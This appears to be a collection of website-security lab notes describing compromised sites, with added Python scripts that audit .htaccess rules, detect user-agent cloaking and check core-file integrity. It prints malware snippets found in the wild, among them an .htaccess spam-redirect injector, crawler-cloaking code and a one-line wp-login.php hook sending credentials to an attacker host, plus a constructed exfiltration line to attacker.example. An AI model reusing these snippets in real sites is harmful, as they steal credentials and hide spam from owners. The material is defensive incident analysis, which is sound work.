
Lately, we have uncovered and detailed many techniques used against e-commerce platforms to steal sensitive information, mostly credit card data and login credentials. With the holiday season approaching, e-commerce platforms become an even more attractive target because of the increase in sales during the season.

Read More ...

I was assisting a client with their compromised website and came across a file called unsave.php that was primarily used to inject a rewrite rule into the .htaccess file, so that the SEO spam payload of the file goday.php could be delivered to certain visitors sent to the directory hosting these files:

// From unsave.php: if the current directory's .htaccess is non-trivial,
// overwrite the parent directory's .htaccess with a rule that sends every
// request for <name>.html to the SEO spam script goday.php
// (note that the size check reads ./.htaccess while the write targets ../.htaccess)
if ((filesize(".htaccess")) > 100) {
    $out = fopen("../.htaccess", "w");
    fwrite($out, "RewriteEngine On
RewriteRule ^([A-Za-z0-9-]+).html$ goday.php?hl=$1 [L]");
    fclose($out);
}
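The rule above is easy to miss among legitimate rewrite directives. The following script is an added example, not code from the original note: it parses the RewriteRule directives in an .htaccess file and flags any rule whose target is a PHP script other than the platform's own front controller, which is exactly the shape of the goday.php rule. The sample .htaccess text, the file name and the front-controller list are constructed for this example.

```python
"""Audit .htaccess rewrite rules for injected SEO-spam redirects."""
import re
from typing import List, Tuple

# Constructed sample: a standard WordPress block followed by the rule
# that unsave.php writes
SAMPLE_HTACCESS = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteEngine On
RewriteRule ^([A-Za-z0-9-]+).html$ goday.php?hl=$1 [L]
"""

# RewriteRule <pattern> <substitution> [flags]
REWRITE_RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

Rule = Tuple[int, str, str, str]  # (line number, pattern, target, flags)


def parse_rewrite_rules(text: str) -> List[Rule]:
    """Return every RewriteRule in the file with its 1-based line number."""
    rules: List[Rule] = []
    for no, line in enumerate(text.splitlines(), 1):
        m = REWRITE_RULE.match(line)
        if m:
            rules.append((no, m.group(1), m.group(2), m.group(3) or ""))
    return rules


def audit_rules(rules: List[Rule], front_controllers=("index.php",)) -> List[Rule]:
    """Flag rules that hand requests to a PHP script that is not a known
    front controller. Dash ("-") targets and non-PHP targets are ignored."""
    findings: List[Rule] = []
    for rule in rules:
        # drop the query string and any leading slash before comparing
        target = rule[2].split("?", 1)[0].lstrip("/")
        if target.lower().endswith(".php") and target not in front_controllers:
            findings.append(rule)
    return findings


def audit_htaccess(text: str) -> List[Rule]:
    return audit_rules(parse_rewrite_rules(text))


def audit_file(path: str) -> List[Rule]:
    """Same check against an .htaccess on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_htaccess(fh.read())


if __name__ == "__main__":
    for no, pattern, target, flags in audit_htaccess(SAMPLE_HTACCESS):
        print(f"line {no}: '{pattern}' -> '{target}' [{flags}]  <- review this rule")
```

Every flagged rule still needs a human look, since some plugins legitimately route requests to their own scripts; the point is to reduce a long .htaccess to the handful of rules worth reading.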

Read More ...

Attackers use different techniques to distribute SPAM on a compromised website. Most of the time they inject the malicious code into the file system, as that is the more practical approach. There are exceptions, though, and today we are going to talk a little more about them.

Read More ...

Nowadays, the most common issues with database injections are related to SPAM. Brian Krebs has a book called Spam Nation that gives a more in-depth understanding of the economics behind these issues and how large they actually are. Thanks to Ben Martin for letting me know about this book.

Read More ...

With the increase in mobile internet browsing, attackers have adapted their techniques to target these platforms and distribute SPAM and malware to mobile devices. Our free online scanner SiteCheck is tailored to emulate different mobile user agents and warn users about possible issues that may affect their device when accessing a particular website.

Read More ...

Recently we found a very interesting piece of malware that injects symbolic links into each and every Linux/UNIX home folder. Once the website is infected, it uses the following code to avoid detection by search engine crawlers, so that it can be triggered only by the attackers:

// Serve a 404 to well-known search engine crawlers so the injected
// content is never indexed; every other visitor gets the payload
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if (preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
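Cloaking of this kind is invisible to a single request, which is why a scanner has to look at the same URL through several user agents. The script below is an added example, not code from the original note: it models the injected check (404 for crawlers, the payload for everyone else) as a small request handler, then runs the probe a scanner can perform, requesting the resource under several User-Agent strings and reporting the ones whose response differs from an ordinary browser's. The handlers, the user-agent strings and the fetch interface are constructed here; the same probe generalizes to the mobile-versus-desktop comparison the SiteCheck note above describes.

```python
"""Detect user-agent cloaking by comparing responses across user agents."""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, str]                     # (HTTP status, body)
Fetch = Callable[[Dict[str, str]], Response]   # perform a request with given headers

# The crawler names from the injected PHP snippet
BOT_NAMES = ["Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"]
BOT_RE = re.compile("|".join(map(re.escape, BOT_NAMES)), re.I)


def cloaked_handler(headers: Dict[str, str]) -> Response:
    """Constructed stand-in for an infected page with the logic above."""
    ua = headers.get("User-Agent", "")
    if ua and BOT_RE.search(ua):
        return 404, "Not Found"
    return 200, "<html>injected payload</html>"


def clean_handler(headers: Dict[str, str]) -> Response:
    """Constructed stand-in for a page that serves everyone the same content."""
    return 200, "<html>normal page</html>"


# Constructed probe set: one ordinary browser plus several crawler strings.
# "bingbot" does not contain "MSNBot", so it slips past the injected list;
# probing with several agents is what surfaces such gaps.
PROBE_AGENTS = {
    "browser": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/115.0",
    "googlebot": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "bingbot": "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
    "yandexbot": "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
}


def probe(fetch: Fetch, agents: Dict[str, str] = PROBE_AGENTS) -> Dict[str, Response]:
    """Fetch the resource once per user agent."""
    return {label: fetch({"User-Agent": ua}) for label, ua in agents.items()}


def cloaked_for(results: Dict[str, Response], baseline: str = "browser") -> List[str]:
    """Labels whose (status, body) differ from the baseline agent's response."""
    base = results[baseline]
    return sorted(label for label, resp in results.items() if resp != base)


def check_cloaking(fetch: Fetch) -> List[str]:
    return cloaked_for(probe(fetch))


def http_fetcher(url: str, timeout: float = 10.0) -> Fetch:
    """Real fetcher for a live check (not used by the offline demo below)."""
    def fetch(headers: Dict[str, str]) -> Response:
        req = urllib.request.Request(url, headers=headers)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode("utf-8", "replace")
    return fetch


if __name__ == "__main__":
    print("infected page differs for:", check_cloaking(cloaked_handler))  # ['googlebot', 'yandexbot']
    print("clean page differs for:", check_cloaking(clean_handler))       # []
```

On a live site, pass `http_fetcher(url)` to `check_cloaking`. Dynamic pages embed nonces, timestamps and session-specific markup, so a production check should normalize or hash only the stable parts of the body before comparing, otherwise every agent looks "different".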

Read More ...

From the hacker's perspective, maintaining access to a compromised website for as long as possible is ideal. One way to achieve this goal is by stealing users' credentials. This method can also provide the chance to spread the attack to other platforms, in case the user reuses the same password on other services, such as email.

Once the attackers inject the code into the site, they must send the stolen data somewhere. It can either be stored in a local file, or sent remotely to an email address or another server.

During an incident response investigation, we identified malicious code of this kind sending the credentials to a remote website controlled by the attacker. This code was very interesting because it didn't use the regular methods, like the mail() function or a curl request. Instead, the attackers used file_get_contents().

The following snippet was found inside the wp-login.php file:

// Legitimate wp-login.php context: the login has just succeeded
if ( !is_wp_error($user) && !$reauth ) {
    // Injected line: an HTTP GET to the attacker's server carries the stolen
    // data out; the remainder of the argument was removed from this note
    file_get_contents(base64_decode('aHh4cDovvL2luZm<REMOVED CONTENT>/dXJsPQ=='));
    if ( $interim_login ) {

The malicious code is just one line long, making it hard to spot for the untrained eye in a complex file like wp-login.php. The base64-encoded string decodes to "hxxp://infected-site.com/getpwd.php?url=", the attacker-controlled site.

wp-login.php is a WordPress core file and should not differ from its original version (unless WordPress itself ships an official update to it).

Using a File Integrity Monitoring system can help you detect these modifications and take the necessary actions to prevent further damage to your website's online presence. We also recommend having a website application firewall in place to prevent brute force attacks and unauthorized access to your back-end interface.
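What file integrity monitoring actually does for a case like this is worth showing concretely. The script below is an added example, not code from the original note or from WordPress: it compares a core file's SHA-256 with a trusted baseline hash and, on mismatch, reports every file_get_contents(base64_decode('...')) call together with the decoded string, so the analyst immediately sees where data would be sent. The excerpts, the baseline and the encoded destination are constructed; a real baseline comes from a clean copy of the same WordPress version (the per-version checksums that `wp core verify-checksums` compares against).

```python
"""File-integrity check for a core file plus a scan for the injected exfiltration call."""
import base64
import hashlib
import re
from typing import Dict, List, Tuple

# Constructed clean excerpt standing in for the real wp-login.php
CLEAN_EXCERPT = (
    b"<?php\n"
    b"if ( !is_wp_error($user) && !$reauth ) {\n"
    b"    if ( $interim_login ) {\n"
)

# Constructed destination, encoded the way the real sample was
FAKE_DESTINATION = b"hxxp://attacker.example/getpwd.php?url="
INJECTED_EXCERPT = (
    b"<?php\n"
    b"if ( !is_wp_error($user) && !$reauth ) {\n"
    b"    file_get_contents(base64_decode('" + base64.b64encode(FAKE_DESTINATION) + b"'));\n"
    b"    if ( $interim_login ) {\n"
)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Baseline hashes, built here from the clean copy; store these out-of-band
BASELINE: Dict[str, str] = {"wp-login.php": sha256_hex(CLEAN_EXCERPT)}

# file_get_contents(base64_decode('<base64>') with optional whitespace
EXFIL_RE = re.compile(
    rb"file_get_contents\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]"
)


def find_exfil_calls(source: bytes) -> List[Tuple[int, str]]:
    """(line number, decoded string) for each encoded file_get_contents call."""
    hits: List[Tuple[int, str]] = []
    for no, line in enumerate(source.splitlines(), 1):
        for m in EXFIL_RE.finditer(line):
            try:
                decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
            except ValueError as exc:  # binascii.Error is a ValueError subclass
                decoded = f"<undecodable: {exc}>"
            hits.append((no, decoded))
    return hits


def check_file(name: str, contents: bytes, baseline: Dict[str, str] = BASELINE) -> dict:
    """FIM verdict for one file: modified flag plus any exfil calls found."""
    modified = baseline.get(name) != sha256_hex(contents)
    return {
        "file": name,
        "modified": modified,
        "exfil_calls": find_exfil_calls(contents) if modified else [],
    }


def check_path(path: str, baseline: Dict[str, str] = BASELINE) -> dict:
    """Same check for a file on disk, keyed by its path in the baseline."""
    with open(path, "rb") as fh:
        return check_file(path, fh.read(), baseline)


if __name__ == "__main__":
    for label, data in (("clean", CLEAN_EXCERPT), ("injected", INJECTED_EXCERPT)):
        print(label, check_file("wp-login.php", data))
```

The hash comparison is the part that scales: it catches any edit to a core file, including variants that encode the destination differently, while the regex only explains the particular edit this note describes. Files missing from the baseline are reported as modified on purpose, so a newly dropped script in a core directory is not silently skipped.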

Recently, during an incident response process, we found a floating advertisement banner on specific pages of an HTML-based website. Contrary to what many people think, these websites are also targets of attacks and can be infected.

Unlike on other platforms, the entry point in this scenario is easier to detect because HTML-based pages are static content and have fewer components that could expose the website to a particular vulnerability.

Read More ...

Recently we found another variant of malware that intercepts credit card data by injecting code into the PayPal payment method file "app/code/core/Mage/Paypal/Model/Direct.php".

Read More ...

A few weeks ago, we posted a lab note describing a legitimate theme file being exploited by attackers to send mass-mailing SPAM (http://labs.sucuri.net/?note=2016-08-15). Upon further investigation, we identified that attackers have been exploiting this issue for quite a while, apparently under the radar.

The lack of security checks in that particular file allows attackers to send as many emails as they like, limited only by the server's configuration. To make matters worse, the same code had been shipped across different themes developed by the same company.

The issue is located within the file ‘functions/theme-mail.php’ and can be found in older versions of the following premium themes:

bretheon, doover, fingerprints, kora, lawcenter_two,
mfl, pindol, tisson, almet, caffeine, nollie, limuso

The consequences of using those old versions vary, from having your website suspended by the hosting company to getting the mail server blacklisted.

We didn't have access to all versions of those themes to determine when a patch was applied, but if you identify the same snippet we showed in the Sucuri Labs note, we highly recommend adding the following code right after the opening PHP tag to prevent direct access to the file and further exploitation:

// When theme-mail.php is included by WordPress, PHP_SELF is the requested
// script (e.g. index.php), so the two basenames differ; on a direct request
// they match and the script stops before any mail is sent
if ( basename($_SERVER['PHP_SELF']) == basename(__FILE__) ) {
    die('Access Denied');
}

If you’re a customer on the Sucuri Firewall you are already patched via our virtual patching engine.